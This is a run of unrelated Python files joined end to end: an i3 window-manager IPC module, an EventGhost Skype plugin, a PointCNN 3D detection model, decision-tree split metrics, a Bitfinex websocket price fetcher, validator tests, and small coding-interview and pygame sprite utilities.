grid = mlab.pipeline.scalar_field(xi, yi, zi, data) vmin = np.min(data) vmax = np.max(data) mlab.pipeline.volume(grid, vmin=vmin, vmax=(vmax + vmin) / 2) mlab.axes() mlab.show() @classmethod def from_sdf(cls, sdf_file): with open(sdf_file, 'r') as file: axis = 2 lines = file.readlines() nx, ny, nz = map(int, lines[0].split(' ')) x0, y0, z0 = map(float, lines[1].split(' ')) delta = float(lines[2].strip()) data = np.zeros([nx, ny, nz]) for i, line in enumerate(lines[3:]): idx = i % nx idy = int(i / nx) % ny idz = int(i / (nx * ny)) val = float(line.strip()) data[idx, idy, idz] = val return cls(data, np.array([x0, y0, z0]), delta) @classmethod def from_pkl(cls, pkl_file): with open(pkl_file, 'rb') as file: if sys.version_info >= (3, 0): data = pickle.load(file, encoding='bytes', fix_imports=True) else: data = pickle.load(file) return cls(data[b'data'], data[b'origin'], data[b'delta']) 10-100 """Inter Process Communication functionality.""" import logging import subprocess from pathlib import Path log = logging.getLogger(__name__) def configure(cnf=None, deactivate=False): if deactivate: I3.configure(None) I3bar.configure(None) Notify.configure(None) log.info("ipc deactivated") else: I3.configure(cnf.payload["main"]["i3_refresh_msg"]) log.info(f"set i3 refresh method to {I3.refresh.__name__}") I3bar.configure(cnf.payload["main"]["status_command"]) log.info(f"set i3bar refresh method to {I3bar.refresh.__name__}") Notify.configure(cnf.payload["main"]["notify"]) log.info(f"set notify method to {Notify.send.__name__}") def communicate(msg="new config active", refresh=False, urgency="low"): if refresh: I3.refresh() I3bar.refresh() Notify.send(msg, urgency=urgency) class I3: @classmethod def configure(cls, which): cls.refresh = cls.METHOD_MAP.get(which, nop) @classmethod def reload_i3(cls): cls._send_i3_msg("reload") @classmethod def restart_i3(cls): subprocess.call(["i3-msg", "restart"]) refresh = restart_i3 METHOD_MAP = {"restart": restart_i3, "reload": reload_i3} @classmethod def _send_i3_msg(cls, msg): try: output = subprocess.check_output(["i3-msg", msg]).decode() if '"success":true' in output: return True return False except subprocess.CalledProcessError as e: if msg == "restart" and e.returncode == 1: log.debug("[IGNORE] exit 1 is ok for restart") return True @classmethod def get_config_error_report(cls, path): cmd = ["i3", "-C", "-c", str(path)] try: return subprocess.check_output(cmd).decode() except subprocess.CalledProcessError as e: return e.output.decode() except FileNotFoundError as e: assert Path(path).exists(), path assert "No such file or directory: 'i3'" in e.strerror log.warning("[IGNORE] crashed - no i3 -> assuming test system") return "" class Notify: @classmethod def configure(cls, notify): cls.send = cls.notify_send if notify else nop @classmethod def notify_send(cls, msg, urgency="low"): """urgency levels: low, normal, critical""" subprocess.check_call( ["notify-send", "-a", "i3configger", "-t", "1", "-u", urgency, msg] ) send = notify_send class I3bar: command = "i3status" @classmethod def configure(cls, command): cls.command = command cls.refresh = cls.refresh if command else nop @classmethod def send_sigusr1(cls): try: subprocess.check_output(["killall", "-SIGUSR1", cls.command]) except subprocess.CalledProcessError as e: log.debug("[IGNORE] failed status refresh: %s", e) refresh = send_sigusr1 def nop(*args, **kwargs): log.debug(f"just ignored everything to do with {args} and {kwargs}") Skype/__init__.py import eg eg.RegisterPlugin( name = "Skype", author = " ()", version = "0.0.1", kind = "program", guid = "{950A9379-87D1-4981-99DF-AB727D53A0EB}", url = "https://github.com/OrbitalDan/EventghostSkypePlugin", description = ( 'Adds events and actions to interact with
Skype.' ), ) # TODO: Add icon like so: #icon = ( # "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACDElEQVR42pWTT0gUcRTH" # "" # "" # "//" # "NpsleidES8NL1I6rkBzj8tAXYyhVkLcJuGHTNNEfRPmR1ghfOwo1p2B2hO7HefP+m8Jh" # "290sE3DDtuXdZIjwuVXE2gNwpAuexdCeVxMZ+5xw10Rww+l0Wn14t4vOEx+Q5CY7ah0U" # "bJc1D+Z3Ae1ehs7oOLIsl0QEd2RNs597+iPkFsH6DScvwNfX9nkZMnNMr/yCtkcoilIq" # "7HaBphFY+Qmt3TY4D1Mz4PXAnjUGJ/Io4VkkSdoU2JpCIHCG+HAP0twU5D/BoSrMhW9o" # "SZGWKwOoqlqCnRTcRTSMFLF+P1L6KeyznKh60iJXf5HeW2FEUSyDy37B690fm7zdHpSs" # "t3Cwiuz8IlGjEX/PgJOzu6Hcre1sfHU1kXj0fFiyUlBcRRtdYm9bHzdCNzd7vgJcEuho" # "rn01er1eMYwFQk/MaV/zJaVSK1caKuei/Vh1XG7wKP0vLM0+Dv5jmCpOo2/DZv93nP8A" # "opkfXpsJ2wUAAAAASUVORK5CYII=" #), from threading import Event, Thread import win32com.client import pythoncom # Event handler object to relay events back to main plugin class class SkypeCallStatusHandler(object): def SetPluginParent(self,parent): self.parent = parent def SetSkypeClient(self,skype): self.skype = skype def OnCallStatus(self, theCall, callStatus): self.parent.SetStatus(self.skype.Convert.CallStatusToText(callStatus)) #End SkypeCallStatusHandler class Skype(eg.PluginBase): #--- Lifecycle Management ----------------------------------------- def __init__(self): self.status = "" print "Skype Plugin is initialized." def __start__(self): self.stopThreadEvent = Event() thread = Thread( target=self.ThreadLoop, args=(self.stopThreadEvent, ) ) thread.start() print "Skype Plugin is started." def __stop__(self): self.stopThreadEvent.set() print "Skype Plugin is stopped." def __close__(self): print "Skype Plugin is closed." #--- External COM Thread ------------------------------------------ def ThreadLoop(self, stopThreadEvent): pythoncom.CoInitialize() skype = win32com.client.Dispatch("Skype4COM.Skype") skype.Attach() handler = win32com.client.WithEvents(skype, SkypeCallStatusHandler) handler.SetSkypeClient(skype) handler.SetPluginParent(self) while not stopThreadEvent.isSet(): pythoncom.PumpWaitingMessages() stopThreadEvent.wait(1.0) def SetStatus(self, status): if ( self.status != status ): self.status = status self.TriggerEvent(status) #------------------------------------------------------------------ #End Skype Pluginmodels/frustum_pointcnn.py ''' Frustum PointNets v2 Model. ''' from __future__ import print_function import sys import os import tensorflow as tf import numpy as np import importlib BASE_DIR = os.path.dirname(os.path.abspath(__file__)) ROOT_DIR = os.path.dirname(BASE_DIR) sys.path.append(BASE_DIR) sys.path.append(os.path.join(ROOT_DIR, 'utils')) import tf_util from pointnet_util import pointnet_sa_module, pointnet_sa_module_msg, pointnet_fp_module from model_util import NUM_HEADING_BIN, NUM_SIZE_CLUSTER, NUM_OBJECT_POINT from model_util import point_cloud_masking, get_center_regression_net from model_util import placeholder_inputs, parse_output_to_tensors, get_loss pointcnn_setting_path = os.path.join(os.path.dirname(__file__), 'pointcnn') sys.path.append(pointcnn_setting_path) from pointcnn import PointCNN from pointcnn_seg import PointCNNSegNet from pointcnn_box_estimate import PointCNNBoxNet def get_instance_seg_v2_net(point_cloud, one_hot_vec, is_training, bn_decay, end_points): ''' 3D instance segmentation PointNet v2 network. Input: point_cloud: TF tensor in shape (B,N,4) frustum point clouds with XYZ and intensity in point channels XYZs are in frustum coordinate one_hot_vec: TF tensor in shape (B,3) length-3 vectors indicating predicted object type is_training: TF boolean scalar bn_decay: TF float scalar end_points: dict Output: logits: TF tensor in shape (B,N,2), scores for bkg/clutter and object end_points: dict ''' setting = importlib.import_module('segmentation') xyz = tf.slice(point_cloud, [0,0,0], [-1,-1,3]) features = tf.slice(point_cloud, [0,0,3], [-1,-1,1]) # (B, 3) -> (B, N, 3) feat_one_hot = tf.tile(tf.expand_dims(one_hot_vec, 1), [1, point_cloud.get_shape()[1], 1]) features = tf.concat([features, feat_one_hot], 2) seg_net = PointCNNSegNet(xyz, features, is_training, setting) output = seg_net.output # end_points['feats']? return output, end_points def get_3d_box_estimation_v2_net(object_point_cloud, one_hot_vec, is_training, bn_decay, end_points): ''' 3D Box Estimation PointNet v2 network. Input: object_point_cloud: TF tensor in shape (B,M,C) masked point clouds in object coordinate one_hot_vec: TF tensor in shape (B,3) length-3 vectors indicating predicted object type Output: output: TF tensor in shape (B,3+NUM_HEADING_BIN*2+NUM_SIZE_CLUSTER*4) including box centers, heading bin class scores and residuals, and size cluster scores and residuals ''' setting = importlib.import_module('box_estimate') features = tf.tile(tf.expand_dims(one_hot_vec, 1), [1, object_point_cloud.get_shape()[1], 1]) box_net = PointCNNBoxNet(object_point_cloud, features, is_training, setting) output = box_net.output return output, end_points def get_model(point_cloud, one_hot_vec, is_training, bn_decay=None): ''' Frustum PointNets model. The model predict 3D object masks and amodel bounding boxes for objects in frustum point clouds. Input: point_cloud: TF tensor in shape (B,N,4) frustum point clouds with XYZ and intensity in point channels XYZs are in frustum coordinate one_hot_vec: TF tensor in shape (B,3) length-3 vectors indicating predicted object type is_training: TF boolean scalar bn_decay: TF float scalar Output: end_points: dict (map from name strings to TF tensors) ''' end_points = {} # 3D Instance Segmentation PointNet logits, end_points = get_instance_seg_v2_net(\ point_cloud, one_hot_vec, is_training, bn_decay, end_points) end_points['mask_logits'] = logits # Masking # select masked points and translate to masked points' centroid object_point_cloud_xyz, mask_xyz_mean, end_points = \ point_cloud_masking(point_cloud, logits, end_points) # T-Net and coordinate translation center_delta, end_points = get_center_regression_net(\ object_point_cloud_xyz, one_hot_vec, is_training, bn_decay, end_points) stage1_center = center_delta + mask_xyz_mean # Bx3 end_points['stage1_center'] = stage1_center # Get object point cloud in object coordinate object_point_cloud_xyz_new = \ object_point_cloud_xyz - tf.expand_dims(center_delta, 1) # Amodel Box Estimation PointNet output, end_points = get_3d_box_estimation_v2_net(\ object_point_cloud_xyz_new, one_hot_vec, is_training, bn_decay, end_points) # Parse output to 3D box parameters end_points = parse_output_to_tensors(output, end_points) end_points['center'] = end_points['center_boxnet'] + stage1_center # Bx3 return end_points if __name__=='__main__': with tf.Graph().as_default(): inputs = tf.zeros((32,1024,4)) outputs = get_model(inputs, tf.ones((32,3)), tf.constant(True)) for key in outputs: print((key, outputs[key])) loss = get_loss(tf.zeros((32,1024),dtype=tf.int32), tf.zeros((32,3)), tf.zeros((32,),dtype=tf.int32), tf.zeros((32,)), tf.zeros((32,),dtype=tf.int32), tf.zeros((32,3)), outputs) print(loss) import math from itertools import combinations import numpy as np import pandas as pd from tabulate import tabulate def load_dataset(filename: str): df = pd.read_csv(filename, header=None) global dataset_size dataset_size = df.shape[0] print(tabulate([['Dataset Size', dataset_size], ['# of Attributes', df.shape[1] - 1]], tablefmt='grid', headers=['Dataset Summary', filename])) return df def entropy(dataset: pd.DataFrame, class_label_column): entropy_node = 0 values = dataset[class_label_column].unique() for val in values: # print(val, dataset[class_label_column].value_counts()[val]) p_i = dataset[class_label_column].value_counts()[val] / len(dataset[class_label_column]) entropy_node += (-p_i * np.log2(p_i)) return entropy_node def entropy_attribute(dataset: pd.DataFrame, class_label_column, attribute): entropy_attr = 0 attr_vars = dataset[attribute].unique() for val in attr_vars: # print('\nAj =', val) df_attr = dataset[dataset[attribute] == val] # print(df_attr) info = entropy(df_attr, class_label_column) # print('Info(Dj) =', info) # print('Dj :', df_attr.shape[0], 'D :', dataset_size) fraction = df_attr.shape[0] / dataset_size # print('Dj / D = ', fraction) entropy_attr += (fraction * info) return entropy_attr def entropy_attribute_cont(dataset: pd.DataFrame, class_label_column, attribute): attr_col = dataset[attribute].sort_values() min_entropy = float('inf') split_pt = 0 # print(len(attr_col.unique())) for i in range(len(attr_col) - 1): if attr_col.iloc[i] == attr_col.iloc[i + 1]: continue mid_pt = (attr_col.iloc[i] + attr_col.iloc[i + 1]) / 2 d1 = dataset[dataset[attribute] <= mid_pt] d2 = dataset[dataset[attribute] > mid_pt] e1 = entropy(d1, class_label_column) e2 = entropy(d2, class_label_column) _entropy = ((d1.shape[0] / dataset_size) * e1) + ((d2.shape[0] / dataset_size) * e2) if _entropy < min_entropy: min_entropy = _entropy split_pt = mid_pt return min_entropy, split_pt def gain(dataset: pd.DataFrame, class_label_column, attribute): _gain = entropy(dataset, class_label_column) - entropy_attribute(dataset, class_label_column, attribute) return _gain def gini(dataset: pd.DataFrame, class_label_column): labels = dataset[class_label_column].unique() list_pi = list() for val in labels: # print(val, dataset[class_label_column].value_counts()[val]) p_i = dataset[class_label_column].value_counts()[val] / len(dataset[class_label_column]) list_pi.append(p_i ** 2) _gini = 1 - sum(list_pi) return _gini def gini_attribute(dataset: pd.DataFrame, class_label_column, attribute): attr_vals = dataset[attribute].unique() # print(attr_vals) min_gini = float('inf') splitting_attr = list() for r in range(1, math.floor(len(attr_vals) / 2) + 1): comb_list = list(combinations(attr_vals, r)) for subset in comb_list: d1 = set(attr_vals) - set(subset) d2 = set(subset) # print('D1 :', d1, 'D2 :', d2) g1 = dataset[dataset[attribute].isin(d1)] g2 = dataset[dataset[attribute].isin(d2)] # print('G1 :', g1.shape[0], 'g2 :', g2.shape[0]) G1 = gini(g1, class_label_column) G2 = gini(g2, class_label_column) # print('GINI - 1 :', G1, 'GINI - 2 :', G2) _gini_attr = ((g1.shape[0] / dataset_size) * G1) + ((g2.shape[0] / dataset_size) * G2) # print('GINI_ATTR :', _gini_attr) if _gini_attr <= min_gini: min_gini = _gini_attr splitting_attr = [d1, d2] # print('MAX GINI:', mx_gini) # print(splitting_attr, '\n') return min_gini, splitting_attr def gini_cont(dataset: pd.DataFrame, class_label_column, attribute): attr_col = dataset[attribute].sort_values() min_gini = float('inf') split_pt = 0 # print(attr_col) for i in range(len(attr_col) - 1): if attr_col.iloc[i] == attr_col.iloc[i + 1]: continue mid_pt = (attr_col.iloc[i] + attr_col.iloc[i + 1]) / 2 d1 = dataset[dataset[attribute] <= mid_pt] d2 = dataset[dataset[attribute] > mid_pt] g1 = gini(d1, class_label_column) g2 = gini(d2, class_label_column) _gini = ((d1.shape[0] / dataset_size) * g1) + ((d2.shape[0] / dataset_size) * g2) if _gini < min_gini: min_gini = _gini split_pt = mid_pt return min_gini, split_pt if __name__ == '__main__': data = load_dataset('Dataset/Iris/iris.data') print(gini(data, class_label_column=4)) print() # spl_attr, spl_pt = selct_attr_gini_cont(data, class_label_column=4) # print(spl_attr, spl_pt) 0 #!/usr/bin/env python3 import os import sys import json import errno import matplotlib.pyplot as plt def main(): if len(sys.argv) < 2 or ("-h" in sys.argv) or ("--help" in sys.argv): print(f"Usage: {sys.argv[0]} ") print("Input:\n\ttext:json\n\t\t{ \"x\": [1,2,3,...], \"y\": [1,2,3,...] }\n\ttext:python array\n\t\t[1,2,3,...]\n") exit(0) data = [] arg = sys.argv[1] if os.path.isfile(arg): with open(arg, "r") as file: data = json.load(file) else: data = json.loads(arg) if isinstance(data, list): plt.plot(data) elif isinstance(data,dict) and ("x" in data) and ("y" in data): plt.plot(data["x"], data["y"]) else: exit(errno.EINVAL) plt.show() if __name__ == "__main__": main() ### This module uses websocket to fetch bitfinex 1-minute OHLCV data in real time import sys import random import logging import asyncio import json import redis import websockets from typing import Any, Iterable, NoReturn from common.config.constants import ( REDIS_HOST, REDIS_USER, REDIS_PASSWORD, REDIS_DELIMITER ) from common.utils.asyncioutils import AsyncLoopThread from fetchers.config.constants import ( WS_SUB_REDIS_KEY, WS_SERVE_REDIS_KEY, WS_SUB_LIST_REDIS_KEY, WS_RATE_LIMIT_REDIS_KEY ) from fetchers.config.queries import MUTUAL_BASE_QUOTE_QUERY from fetchers.rest.bitfinex import BitfinexOHLCVFetcher, EXCHANGE_NAME from fetchers.utils.ratelimit import AsyncThrottler from fetchers.utils.exceptions import ( UnsuccessfulConnection, ConnectionClosed, InvalidStatusCode ) # Bitfinex only allows up to 30 subscriptions per ws connection URI = "wss://api-pub.bitfinex.com/ws/2" MAX_SUB_PER_CONN = 25 BACKOFF_MIN_SECS = 2.0 BACKOFF_MAX_SECS = 60.0 class BitfinexOHLCVWebsocket: def __init__(self): self.redis_client = redis.Redis( host=REDIS_HOST, username=REDIS_USER, password=, decode_responses=True ) # Mapping from ws_symbol to symbol # and mapping from channel ID to symbol self.wssymbol_mapping = {} self.chanid_mapping = {} # Rest fetcher for convenience self.rest_fetcher = BitfinexOHLCVFetcher() # Logging self.logger = logging.getLogger(f'{EXCHANGE_NAME}_websocket') self.logger.setLevel(logging.INFO) log_handler = logging.StreamHandler() log_handler.setLevel(logging.INFO) log_formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') log_handler.setFormatter(log_formatter) self.logger.addHandler(log_handler) # Rate limit manager # Limit to attempt to connect every 3 secs self.rate_limiter = AsyncThrottler( WS_RATE_LIMIT_REDIS_KEY.format(exchange = EXCHANGE_NAME), 1, 3, redis_client = self.redis_client ) # Backoff self.backoff_delay = BACKOFF_MIN_SECS # Loop # self.loop_handler = AsyncLoopThread(daemon=None) # self.loop_handler.start() async def subscribe_one( self, symbol: str, ws_client: Any ) -> None: ''' Connects to WS endpoint for a symbol :params: `symbol`: string of symbol `ws_client`: websockets client obj ''' tsymbol = self.rest_fetcher.make_tsymbol(symbol) ws_symbol = f"trade:1m:{tsymbol}" self.wssymbol_mapping[ws_symbol] = symbol msg = {'event': 'subscribe', 'channel': 'candles', 'key': ws_symbol} await ws_client.send(json.dumps(msg)) async def subscribe(self, symbols: Iterable, i: int = 0) -> NoReturn: ''' Subscribes to Bitfinex WS for `symbols` :params: `symbols` list of symbols e.g., ['ETHBTC', 'BTCEUR'] ''' while True: try: # Delay before making a connection # async with self.rate_limiter: async with websockets.connect(URI, ping_interval=10) as ws: await asyncio.gather( *(self.subscribe_one(symbol, ws) for symbol in symbols)) self.logger.info(f"Connection {i}: Successful") self.backoff_delay = BACKOFF_MIN_SECS while True: resp = await ws.recv() respj = json.loads(resp) # If resp is dict, find the symbol using wssymbol_mapping # and then map chanID to found symbol # If resp is list, make sure its length is 6 # and use the mappings to find symbol and push to Redis if isinstance(respj, dict): if 'event' in respj: if respj['event'] == "subscribed": symbol = self.wssymbol_mapping[respj['key']] self.chanid_mapping[respj['chanId']] = symbol elif respj['event'] == "error": self.logger.error( f"Connection {i}: Subscription failed, raising exception") raise UnsuccessfulConnection elif isinstance(respj, list): if len(respj) == 2 and len(respj[1]) == 6: try: symbol = self.chanid_mapping[respj[0]] timestamp = int(respj[1][0]) open_ = respj[1][1] high_ = respj[1][3] low_ = respj[1][4] close_ = respj[1][2] volume_ = respj[1][5] sub_val = f'{timestamp}{REDIS_DELIMITER}{open_}{REDIS_DELIMITER}{high_}{REDIS_DELIMITER}{low_}{REDIS_DELIMITER}{close_}{REDIS_DELIMITER}{volume_}' # Setting Redis data for updating ohlcv psql db # and serving real-time chart # This Redis-update-ohlcv-psql-db-procedure # may be changed with a pipeline from fastAPI... base_id = self.rest_fetcher.symbol_data[symbol]['base_id'] quote_id = self.rest_fetcher.symbol_data[symbol]['quote_id'] ws_sub_redis_key = WS_SUB_REDIS_KEY.format( exchange = EXCHANGE_NAME, base_id = base_id, quote_id = quote_id, delimiter = REDIS_DELIMITER, ) ws_serve_redis_key = WS_SERVE_REDIS_KEY.format( exchange = EXCHANGE_NAME, base_id = base_id, quote_id = quote_id, delimiter = REDIS_DELIMITER ) # logging.info(f'ws sub redis key: {ws_sub_redis_key}') # logging.info(f'ws serve redis key: {ws_serve_redis_key}') # Add ws sub key to set of all ws sub keys # Set hash value for ws sub key # Replace ws serve key hash if this timestamp # is more up-to-date self.redis_client.sadd( WS_SUB_LIST_REDIS_KEY, ws_sub_redis_key) self.redis_client.hset( ws_sub_redis_key, timestamp, sub_val) current_timestamp = self.redis_client.hget( ws_serve_redis_key, 'time') if current_timestamp is None or \ timestamp >= int(current_timestamp): self.redis_client.hset( ws_serve_redis_key, mapping = { 'time': timestamp, 'open': open_, 'high': high_, 'low': low_, 'close': close_, 'volume': volume_ } ) except Exception as exc: self.logger.warning( f"Bitfinex WS Fetcher: EXCEPTION: {exc}") # Sleep to release event loop await asyncio.sleep(0.01) except (ConnectionClosed, InvalidStatusCode) as exc: self.logger.warning( f"Connection {i} raised exception: {exc} - reconnecting..." ) await asyncio.sleep(min(self.backoff_delay, BACKOFF_MAX_SECS)) self.backoff_delay *= (1+random.random()) # add a random factor async def mutual_basequote(self) -> None: ''' Subscribes to WS channels of the mutual symbols among all exchanges ''' symbols_dict = self.rest_fetcher.get_symbols_from_exch(MUTUAL_BASE_QUOTE_QUERY) self.rest_fetcher.close_connections() # symbols = ["ETHBTC", "BTCEUR"] await asyncio.gather(self.subscribe(symbols_dict.keys())) async def all(self) -> None: # def all(self): ''' Subscribes to WS channels of all symbols ''' self.rest_fetcher.fetch_symbol_data() symbols = tuple(self.rest_fetcher.symbol_data.keys()) # TODO: probably running in different threads is not needed # for i in range(0, len(symbols), MAX_SUB_PER_CONN): # asyncio.run_coroutine_threadsafe( # self.subscribe(symbols[i:i+MAX_SUB_PER_CONN], i), # # self.coroutine(5, i), # self.loop_handler.loop # ) # Subscribe to `MAX_SUB_PER_CONN` per connection (e.g., 30) await asyncio.gather( *( self.subscribe(symbols[i:i+MAX_SUB_PER_CONN], int(i/MAX_SUB_PER_CONN)) for i in range(0, len(symbols), MAX_SUB_PER_CONN) ) ) def run_mutual_basequote(self) -> None: asyncio.run(self.mutual_basequote()) def run_all(self) -> None: asyncio.run(self.all()) # self.all() from src.validator import is_dir, is_file, is_extension, is_bool, is_in_range, is_positive_number def test_is_dir__boolean_should_return_false(): ret_val = is_dir(True) expected_val = False assert ret_val == expected_val def test_is_dir__filename_should_return_false(): ret_val = is_dir('tests/func/test_validator.py') expected_val = False assert ret_val == expected_val def test_is_dir__directory_should_return_true(): ret_val = is_dir('tests/func/') expected_val = True assert ret_val == expected_val def test_is_file__boolean_should_return_false(): ret_val = is_file(False) expected_val = False assert ret_val == expected_val def test_is_file__directory_should_return_false(): ret_val = is_file('tests/func/') expected_val = False assert ret_val == expected_val def test_is_file__filename_should_return_true(): ret_val = is_file('tests/func/test_validator.py') expected_val = True assert ret_val == expected_val def test_is_extension__boolean_should_return_false(): ret_val = is_extension(False) expected_val = False assert ret_val == expected_val def test_is_extension__without_dot_extension_should_return_false(): ret_val = is_extension('jpg') expected_val = False assert ret_val == expected_val def test_is_extension__dot_only_should_return_false(): ret_val = is_extension('.') expected_val = False assert ret_val == expected_val def test_is_extension__dot_plus_extension_should_return_true(): ret_val = is_extension('.jpg') expected_val = True assert ret_val == expected_val def test_is_bool__string_should_return_false(): ret_val = is_bool('True') expected_val = False assert ret_val == expected_val def test_is_bool__boolean_should_return_true(): ret_val = is_bool(False) expected_val = True assert ret_val == expected_val def test_is_in_range__string_num_should_return_false(): target = '3' min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected_val = False assert ret_val == expected_val def test_is_in_range__minimum_num_should_return_false_when_exclude_option_is_true(): target = 1 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__maximum_num_should_return_false_when_exclude_option_is_true(): target = 5 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__minimum_num_should_return_true_when_exclude_option_is_false(): target = 1 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__maximum_num_should_return_true_when_exclude_option_is_false(): target = 5 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_in_range_should_return_true_when_exclude_option_is_true(): target = 2 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_in_range_should_return_true_when_exclude_option_is_true(): target = 4 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_in_range_should_return_true_when_exclude_option_is_false(): target = 2 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_in_range_should_return_true_when_exclude_option_is_false(): target = 4 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_out_of_range_should_return_false_when_exclude_option_is_true(): target = 0 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_out_of_range_should_return_false_when_exclude_option_is_true(): target = 6 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_out_of_range_should_return_false_when_exclude_option_is_false(): target = 0 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_out_of_range_should_return_false_when_exclude_option_is_false(): target = 6 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_positive_number__string_should_return_false(): target = '10' ret_val = is_positive_number(target) expected = False assert ret_val == expected def test_is_positive_number__positive_number_should_return_true(): target = 1 ret_val = is_positive_number(target) expected = True assert ret_val == expected def test_is_positive_number__zero_should_return_false(): target = 0 ret_val = is_positive_number(target) expected = False assert ret_val == expected def test_is_positive_number__negative_number_should_return_false(): target = -1 ret_val = is_positive_number(target) expected = False assert ret_val == expected jrmsdev/hackerrank #!/usr/bin/env python3 from itertools import permutations s, n = input ().strip (). split () n = int (n) for p in permutations (sorted (s), n): print (''.join (p)) from editor_utils.error import atlas_error import sys import os _stdout = sys.stdout sys.stdout = open(os.devnull,'w') import pygame sys.stdout = _stdout del(_stdout) del(sys) del(os) class atlas: def __init__(self, atlas:str): #super().__init() try: self._atlas = pygame.image.load_basic(atlas) #self._atlas = pygame.image.fromstring(bytes.fromhex(atlas),(128,64),"P").convert() except ValueError as e: print(repr(e)) except pygame.error as e: print(repr(atlas_error(e))) @property def atlas(self): return self._atlas @atlas.setter def atlas(self, val): self._atlas = val @atlas.deleter def atlas(self): del(self._atlas) def load( self, multiplier:int, colorkey=(0,0,0,255) ): sprites = [] flags = pygame.RLEACCEL for row in range(8): for item in range(16): # removed depth 8 for the map editor to look RIGHT spr = pygame.Surface((8,8))#,depth=8) spr.blit(self.atlas,(0,0),(item*8,row*8,8,8)) spr_scaled = pygame.transform.scale(spr,(8*multiplier,8*multiplier)) spr_scaled.convert(8) spr_scaled.set_colorkey(colorkey,flags) sprites.append(spr_scaled) del(spr) del(spr_scaled) #del(spr_size) return [sprites[index] for index,spr in enumerate(sprites,start=0)] """ class atlas2: def __init__(self, atlas:str): #super().__init() try: self._atlas = pygame.image.load_basic(atlas) #self._atlas = pygame.image.fromstring(bytes.fromhex(atlas),(128,64),"P").convert() except ValueError as e: print(repr(e)) except pygame.error as e: print(repr(atlas_error(e))) @property def atlas(self): return self._atlas @atlas.setter def atlas(self, val): self._atlas = val @atlas.deleter def atlas(self): del(self._atlas) def load( self, multiplier:int, colorkey=(0,0,0,255) ): sprites = [] flags = pygame.RLEACCEL for row in range(8): for item in range(16): spr = pygame.Surface((8,8),depth=8) spr.blit(self.atlas,(0,0),(item*8,row*8,8,8)) spr_scaled = pygame.transform.scale(spr,(8*multiplier,8*multiplier)) spr_scaled.convert(8) spr_scaled.set_colorkey(colorkey,flags) sprites.append(spr_scaled) del(spr) del(spr_scaled) #del(spr_size) return [sprites[index] for index,spr in enumerate(sprites,start=0)] flags = pygame.RLEACCEL scaled_atlas = pygame.transform.scale(self.atlas,(128*multiplier,64*multiplier)) scaled_atlas.convert(8) scaled_atlas.set_colorkey(colorkey,flags) return scaled_atlas """ """class atlas(object): def __init__(self,atlas): self.sprites:list = [] # can take a path, or bytes / buffer / etc. self._atlas = atlas @property def atlas(self): return self._atlas @atlas.setter def atlas(self,value) -> None: self._atlas = value @atlas.deleter def atlas(self): del(self._atlas) def load_atlas(self): if type(self.atlas)==bytes: # format is P which means 8 bit. unfortunately pygame # won't do 4 bit which is the truth of the pico8 img = pygame.image.frombuffer(self.atlas,(128,64),"P") elif type(self.atlas)==str: try: img = pygame.image.fromstring(bytes.fromhex(self.atlas)) except TypeError: img = pygame.image.load_basic(self.atlas) else: #raise atlas_error(f"""#Unable to load data type {str(type(self.atlas))}. # Must be either file path (string) or bytes.""") # loop through every image in the atlas # -- the atlas is automatically assumed to be 128x64 -- #for row in range(8): # for sprite in range(16): # pass #@property #def gfx(self): # return self.sprites #@gfx.setter #def gfx(self,value): # self.sprites = value #@gfx.deleter #def gfx(self): # del(self.sprites) #def kill(self): # del(self)""" grokking-the-coding-interview/top-k-elements/Frequency-Stack-(hard).py """ LC 895 Design a class that simulates a Stack data structure, implementing the following two operations: push(int num): Pushes the number ‘num’ on the stack. pop(): Returns the most frequent number in the stack. If there is a tie, return the number which was pushed later. Example: After following push operations: push(1), push(2), push(3), push(2), push(1), push(2), push(5) 1. pop() should return 2, as it is the most frequent number 2. Next pop() should return 1 3. Next pop() should return 2 """ from heapq import * class FrequencyStack: def __init__(self): # the i-th occurrences are saved in the same stack # if i is a key (i > 1), then i - 1 is also a key self.f2stack = {} self.n2freqs = {} self.max = -float('inf') def push(self, num): if num in self.n2freqs: self.n2freqs[num] += 1 else: self.n2freqs[num] = 1 self.max = max(self.max, self.n2freqs[num]) if self.n2freqs[num] in self.f2stack: self.f2stack[self.n2freqs[num]].append(num) else: self.f2stack[self.n2freqs[num]] = [num] def pop(self): n = self.f2stack[self.max].pop() self.n2freqs[n] -= 1 if not self.n2freqs[n]: del self.n2freqs[n] if not self.f2stack[self.max]: del self.f2stack[self.max] self.max -= 1 return n def main(): # 2 1 2 5 3 2 frequencyStack = FrequencyStack() frequencyStack.push(1) frequencyStack.push(2) frequencyStack.push(3) frequencyStack.push(2) frequencyStack.push(1) frequencyStack.push(2) frequencyStack.push(5) print(frequencyStack.pop()) print(frequencyStack.pop()) 